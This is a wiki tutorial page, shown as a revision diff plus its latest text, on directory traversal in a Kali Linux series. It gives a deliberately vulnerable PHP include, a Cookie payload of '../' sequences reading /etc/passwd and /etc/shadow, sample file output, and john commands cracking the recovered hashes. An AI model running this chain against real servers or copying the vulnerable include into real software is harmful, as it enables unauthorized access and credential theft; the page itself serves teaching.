Difference between revisions of "Kali Linux: Web Directory Traversal Vulnerability (en)"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with "Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "travers...") |
Onnowpurbo (talk | contribs) |
||
| Line 7: | Line 7: | ||
Here is a simple example of a vulnerable application in PHP, | Here is a simple example of a vulnerable application in PHP, | ||
| − | + | <?php | |
| − | <?php | + | $template = 'red.php'; |
| − | $template = 'red.php'; | + | if (isset($_COOKIE['TEMPLATE'])) |
| − | if (isset($_COOKIE['TEMPLATE'])) | + | $template = $_COOKIE['TEMPLATE']; |
| − | + | include ("/home/users/phpguru/templates/" . $template); | |
| − | include ("/home/users/phpguru/templates/" . $template); | + | ?> |
| − | ?> | ||
| − | |||
The application could be named, for example, vulnerable.php. | The application could be named, for example, vulnerable.php. | ||
| Line 21: | Line 19: | ||
An attack against this system can be done using the following HTTP request, if you are having trouble you can use | An attack against this system can be done using the following HTTP request, if you are having trouble you can use | ||
| − | + | telnet ip-address-server 80 | |
| − | telnet ip-address-server 80 | ||
| − | |||
enter/type one by one the sentences below, | enter/type one by one the sentences below, | ||
| − | + | GET /vulnerable.php HTTP/1.0 | |
| − | GET /vulnerable.php HTTP/1.0 | + | Cookie: TEMPLATE=../../../../../../../../../etc/passwd |
| − | Cookie: TEMPLATE=../../../../../../../../../etc/passwd | + | Cookie: TEMPLATE=../../../../../../../../../etc/shadow |
| − | Cookie: TEMPLATE=../../../../../../../../../etc/shadow | ||
| − | |||
Response from ../../etc/passwd approximately: | Response from ../../etc/passwd approximately: | ||
| − | + | HTTP/1.1 200 OK | |
| − | HTTP/1.1 200 OK | + | Date: Fri, 01 Jun 2018 23:21:52 GMT |
| − | Date: Fri, 01 Jun 2018 23:21:52 GMT | + | Server: Apache/2.4.18 (Ubuntu) |
| − | Server: Apache/2.4.18 (Ubuntu) | + | Vary: Accept-Encoding |
| − | Vary: Accept-Encoding | + | Content-Length: 2164 |
| − | Content-Length: 2164 | + | Connection: close |
| − | Connection: close | + | Content-Type: text/html; charset=UTF-8 |
| − | Content-Type: text/html; charset=UTF-8 | + | |
| − | + | root:x:0:0:root:/root:/bin/bash | |
| − | root:x:0:0:root:/root:/bin/bash | + | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin |
| − | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | + | bin:x:2:2:bin:/bin:/usr/sbin/nologin |
| − | bin:x:2:2:bin:/bin:/usr/sbin/nologin | + | sys:x:3:3:sys:/dev:/usr/sbin/nologin |
| − | sys:x:3:3:sys:/dev:/usr/sbin/nologin | + | sync:x:4:65534:sync:/bin:/bin/sync |
| − | sync:x:4:65534:sync:/bin:/bin/sync | + | games:x:5:60:games:/usr/games:/usr/sbin/nologin |
| − | games:x:5:60:games:/usr/games:/usr/sbin/nologin | + | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin |
| − | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | + | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin |
| − | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | + | .. |
| − | .. | + | .. |
| − | .. | + | etc |
| − | |||
| − | |||
The repeated ../ characters after /home/users/phpguru/templates/ | The repeated ../ characters after /home/users/phpguru/templates/ | ||
| Line 68: | Line 60: | ||
If the server admin is somewhat careless, and changes permissions, for example, | If the server admin is somewhat careless, and changes permissions, for example, | ||
| − | + | sudo su | |
| − | sudo su | + | chmod 644 /etc/shadow |
| − | chmod 644 /etc/shadow | ||
| − | |||
then the command ../../etc/shadow will yield, for example, | then the command ../../etc/shadow will yield, for example, | ||
| − | + | HTTP/1.1 200 OK | |
| − | HTTP/1.1 200 OK | + | Date: Fri, 01 Jun 2018 23:26:47 GMT |
| − | Date: Fri, 01 Jun 2018 23:26:47 GMT | + | Server: Apache/2.4.18 (Ubuntu) |
| − | Server: Apache/2.4.18 (Ubuntu) | + | Vary: Accept-Encoding |
| − | Vary: Accept-Encoding | + | Content-Length: 1767 |
| − | Content-Length: 1767 | + | Connection: close |
| − | Connection: close | + | Content-Type: text/html; charset=UTF-8 |
| − | Content-Type: text/html; charset=UTF-8 | + | |
| − | + | root:!:17273:0:99999:7::: | |
| − | root:!:17273:0:99999:7::: | + | daemon:*:16911:0:99999:7::: |
| − | daemon:*:16911:0:99999:7::: | + | bin:*:16911:0:99999:7::: |
| − | bin:*:16911:0:99999:7::: | + | sys:*:16911:0:99999:7::: |
| − | sys:*:16911:0:99999:7::: | + | sync:*:16911:0:99999:7::: |
| − | sync:*:16911:0:99999:7::: | + | games:*:16911:0:99999:7::: |
| − | games:*:16911:0:99999:7::: | + | man:*:16911:0:99999:7::: |
| − | man:*:16911:0:99999:7::: | + | lp:*:16911:0:99999:7::: |
| − | lp:*:16911:0:99999:7::: | + | mail:*:16911:0:99999:7::: |
| − | mail:*:16911:0:99999:7::: | + | news:*:16911:0:99999:7::: |
| − | news:*:16911:0:99999:7::: | + | uucp:*:16911:0:99999:7::: |
| − | uucp:*:16911:0:99999:7::: | + | .. |
| − | .. | + | .. |
| − | .. | + | etc |
| − | etc | ||
| − | |||
Collect both outputs, for example, | Collect both outputs, for example, | ||
| Line 105: | Line 93: | ||
with these two files then we can crack using john | with these two files then we can crack using john | ||
| − | + | unshadow passwd.txt shadow.txt > mypasswd | |
| − | unshadow passwd.txt shadow.txt > mypasswd | + | john mypasswd |
| − | john mypasswd | + | |
| − | |||
The result will be passwords cracked, approximately | The result will be passwords cracked, approximately | ||
| − | + | Created directory: /root/.john | |
| − | Created directory: /root/.john | + | Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" |
| − | Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" | + | Use the "--format=crypt" option to force loading these as that type instead |
| − | Use the "--format=crypt" option to force loading these as that type instead | + | Using default input encoding: UTF-8 |
| − | Using default input encoding: UTF-8 | + | Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) |
| − | Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) | + | Press 'q' or Ctrl-C to abort, almost any other key for status |
| − | Press 'q' or Ctrl-C to abort, almost any other key for status | + | 123456 (redi) |
| − | 123456 (redi) | + | 123456 (krida) |
| − | 123456 (krida) | + | 123456 (onno) |
| − | 123456 (onno) | + | 123456 (pangtni) |
| − | 123456 (pangtni) | + | 123456 (kasum) |
| − | 123456 (kasum) | + | 123456 (dansatsiber) |
| − | 123456 (dansatsiber) | + | 6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green |
| − | 6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green | + | Use the "--show" option to display all of the cracked passwords reliably |
| − | Use the "--show" option to display all of the cracked passwords reliably | ||
| − | |||
| − | |||
==Admin Mistakes== | ==Admin Mistakes== | ||
| Line 137: | Line 121: | ||
sudo su | sudo su | ||
chmod 644 /etc/shadow | chmod 644 /etc/shadow | ||
| − | |||
Latest revision as of 05:29, 4 January 2025
Directory traversal (or path traversal) is the exploitation of a lack of security validation/sanitization of user-supplied file names, such as characters representing "traverse to parent directory" passed to file APIs.
The goal of this attack is to use misconfigured applications to gain unauthorized access to the file system. This attack exploits the lack of security (although the software acts exactly as it should) differently from exploiting bugs in code.
Directory traversal is also known as ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also considered canonicalization attacks.
Here is a simple example of a vulnerable application in PHP,
<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE']))
$template = $_COOKIE['TEMPLATE'];
include ("/home/users/phpguru/templates/" . $template);
?>
The application could be named, for example, vulnerable.php. Placed under the web folder /var/www/html/vulnerable.php
An attack against this system can be done using the following HTTP request, if you are having trouble you can use
telnet ip-address-server 80
enter/type one by one the sentences below,
GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd Cookie: TEMPLATE=../../../../../../../../../etc/shadow
Response from ../../etc/passwd approximately:
HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:21:52 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 2164 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin .. .. etc
The repeated ../ characters after /home/users/phpguru/templates/ cause include() to traverse to the root directory, then include the Unix password file /etc/passwd.
The /etc/passwd file is typically used for directory traversal examples, and indeed is often used by crackers trying to break in.
On modern Linux/Unix systems, the /etc/passwd file does not contain passwords. Passwords are in the shadow file, which is usually only accessible by root. If the server admin is somewhat careless, and changes permissions, for example,
sudo su chmod 644 /etc/shadow
then the command ../../etc/shadow will yield, for example,
HTTP/1.1 200 OK Date: Fri, 01 Jun 2018 23:26:47 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 1767 Connection: close Content-Type: text/html; charset=UTF-8 root:!:17273:0:99999:7::: daemon:*:16911:0:99999:7::: bin:*:16911:0:99999:7::: sys:*:16911:0:99999:7::: sync:*:16911:0:99999:7::: games:*:16911:0:99999:7::: man:*:16911:0:99999:7::: lp:*:16911:0:99999:7::: mail:*:16911:0:99999:7::: news:*:16911:0:99999:7::: uucp:*:16911:0:99999:7::: .. .. etc
Collect both outputs, for example, output of /etc/password in passwd.txt output of /etc/shadow in shadow.txt with these two files then we can crack using john
unshadow passwd.txt shadow.txt > mypasswd john mypasswd
The result will be passwords cracked, approximately
Created directory: /root/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 6 password hashes with 6 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 123456 (redi) 123456 (krida) 123456 (onno) 123456 (pangtni) 123456 (kasum) 123456 (dansatsiber) 6g 0:00:00:07 DONE 2/3 (2018-06-02 06:32) 0.7894g/s 669.7p/s 711.8c/s 711.8C/s 123456..green Use the "--show" option to display all of the cracked passwords reliably
Admin Mistakes
- Introducing vulnerable PHP
- A critical admin mistake is typing
sudo su chmod 644 /etc/shadow